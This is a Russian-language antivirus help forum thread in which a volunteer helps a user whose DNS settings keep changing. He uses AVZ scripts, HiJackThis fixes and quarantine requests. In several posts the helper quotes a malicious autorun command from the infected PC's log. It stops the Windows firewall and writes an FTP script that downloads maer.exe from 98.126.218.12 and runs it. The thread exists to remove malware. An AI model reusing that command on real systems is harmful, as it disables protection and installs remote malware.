Страница 1 из 2 12 Последняя
Показано с 1 по 20 из 24.

Изменяются DNS (заявка № 113489)

  1. #1
    Junior Member Репутация
    Регистрация
    18.04.2009
    Сообщений
    53
    Вес репутации
    55

    Thumbs up Изменяются DNS

    Добрый день!!! Подскажите пжл, DNS адреса меняются сами по себе, в этот момент отключается интернет, восставливается только после изменений DNS вручную, через некоторое время ошибка повтаряется. KAV находит вирусы и сразу удаляет, но проблема не решается. Спасибо!

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,287
    Вес репутации
    378
    Уважаемый(ая) Олежка, спасибо за обращение на наш форум!

    Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в правилах оформления запроса о помощи.

    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Junior Member Репутация
    Регистрация
    18.04.2009
    Сообщений
    53
    Вес репутации
    55
    Логи. Спасибо!
    Вложения Вложения

  5. #4
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    99,211
    Вес репутации
    3104
    Код:
    c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 98.126.218.12 > cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get maer.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&maer.exe&maer.exe&del cmd.txt
    В автозапуске сами прописывали?

    Выполните скрипт в AVZ
    Код:
    begin
    QuarantineFile('C:\WINDOWS\System32\xsynjlib.exe','');
    BC_ImportAll;
    ExecuteSysClean;
    BC_Activate;
    end.
    Компьютер перезагрузите вручную

    Пришлите карантин согласно Приложения 3 правил по красной ссылке Прислать запрошенный карантин вверху темы
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

  6. #5
    Junior Member Репутация
    Регистрация
    18.04.2009
    Сообщений
    53
    Вес репутации
    55
    [QUOTE=thyrex;848038]
    Код:
    c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 98.126.218.12 > cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get maer.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&maer.exe&maer.exe&del cmd.txt
    В автозапуске сами прописывали?

    нет.

    Добавлено через 56 секунд

    Карантин отправил. Вы его получили?
    Последний раз редактировалось Олежка; 07.12.2011 в 23:36. Причина: Добавлено

  7. #6
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    99,211
    Вес репутации
    3104
    Пофиксите в HiJack
    Код:
    O4 - HKLM\..\Run: [shell] c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 98.126.218.12 > cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get maer.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&maer.exe&maer.exe&del cmd.txt
    Выполните скрипт в AVZ
    Код:
    begin
    DeleteFile('C:\WINDOWS\System32\xsynjlib.exe');
    DeleteService('XsynjSvc');
    BC_ImportAll;
    ExecuteSysClean;
    BC_Activate;
    end.
    Компьютер перезагрузите вручную

    Сделайте новые логи
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

  8. #7
    Junior Member Репутация
    Регистрация
    18.04.2009
    Сообщений
    53
    Вес репутации
    55
    Новые Логи
    Вложения Вложения

  9. #8
    Junior Member Репутация
    Регистрация
    18.04.2009
    Сообщений
    53
    Вес репутации
    55
    После перезагрузки DNS остались правильными, до этого всегда менялись.

  10. #9
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    99,211
    Вес репутации
    3104
    Больше плохого не видно
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

  11. #10
    Junior Member Репутация
    Регистрация
    18.04.2009
    Сообщений
    53
    Вес репутации
    55
    Спасибо!!! Надеюсь будет работать.
    Посмотрите пжл, может и здесь мне сможете помочь http://virusinfo.info/showthread.php?t=113492. Я думаю, что проблема в том же. ПК Были в одной локальной сетке.

  12. #11
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    99,211
    Вес репутации
    3104
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

  13. #12
    Junior Member Репутация
    Регистрация
    18.04.2009
    Сообщений
    53
    Вес репутации
    55
    делаю....

  14. #13
    Junior Member Репутация
    Регистрация
    18.04.2009
    Сообщений
    53
    Вес репутации
    55
    удалять найденные обекты можно?
    Вложения Вложения

  15. #14
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    99,211
    Вес репутации
    3104
    Выполните скрипт в AVZ
    Код:
    begin
    QuarantineFile('c:\documents and settings\default user\local settings\temporary internet files\Content.IE5\APY5K9CR\S01[1].exe', 'MBAM: Malware.Packer');
    QuarantineFile('c:\documents and settings\default user\local settings\temporary internet files\Content.IE5\K9OXQDYH\S01[1].exe', 'MBAM: Malware.Packer');
    QuarantineFile('c:\WINDOWS\system32\s.exe', 'MBAM: Malware.Packer');
    QuarantineFile('c:\RECYCLER\hex2.exe', 'MBAM: Trojan.Agent');
    DeleteFile('c:\documents and settings\default user\local settings\temporary internet files\Content.IE5\APY5K9CR\S01[1].exe');
    DeleteFile('c:\documents and settings\default user\local settings\temporary internet files\Content.IE5\K9OXQDYH\S01[1].exe');
    DeleteFile('c:\WINDOWS\system32\s.exe');
    DeleteFile('c:\RECYCLER\hex2.exe');
    BC_ImportAll;
    ExecuteSysClean;
    BC_Activate;
    end.
    Компьютер перезагрузите вручную

    Пришлите карантин согласно Приложения 3 правил по красной ссылке Прислать запрошенный карантин вверху темы

    Сделайте новый лог МВАМ
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

  16. #15
    Junior Member Репутация
    Регистрация
    18.04.2009
    Сообщений
    53
    Вес репутации
    55
    Карантин отправил

  17. #16
    Junior Member Репутация
    Регистрация
    18.04.2009
    Сообщений
    53
    Вес репутации
    55
    новый лог
    Вложения Вложения

  18. #17
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    99,211
    Вес репутации
    3104
    c:\server.exe - знаком этот файл?
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

  19. #18
    Junior Member Репутация
    Регистрация
    18.04.2009
    Сообщений
    53
    Вес репутации
    55
    нет

  20. #19
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    99,211
    Вес репутации
    3104
    Удалите в МВАМ всё найденное

    Все обновления для сервера установлены?
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

  21. #20
    Junior Member Репутация
    Регистрация
    18.04.2009
    Сообщений
    53
    Вес репутации
    55
    Обновления да. В конце дня все вирусы восстановились, поставил на повторное сканирование. И запустил проверку всех пк в локалке. Припшлю вам новые логи. Спасибо огромное за помощь!!

    Добавлено через 2 минуты

    Добрый вечер. забыл))
    Последний раз редактировалось Олежка; 09.12.2011 в 01:00. Причина: Добавлено

  • Уважаемый(ая) Олежка, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Страница 1 из 2 12 Последняя

    Похожие темы

    1. Изменяются права пользователя
      От rulya в разделе Помогите!
      Ответов: 2
      Последнее сообщение: 09.09.2009, 10:42
    2. Не изменяются настройки вида папок
      От Pete'n'Cat в разделе Помогите!
      Ответов: 4
      Последнее сообщение: 04.09.2009, 01:22
    3. Изменяются значения DNS
      От MrALeXx в разделе Помогите!
      Ответов: 6
      Последнее сообщение: 08.04.2009, 20:45
    4. Изменяются настройки подключения
      От Xakep в разделе Помогите!
      Ответов: 13
      Последнее сообщение: 22.02.2009, 01:54
    5. Outpost - изменяются компоненты
      От MedvedD в разделе Помогите!
      Ответов: 7
      Последнее сообщение: 02.05.2006, 14:21

    Метки для этой темы

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.01081 seconds with 20 queries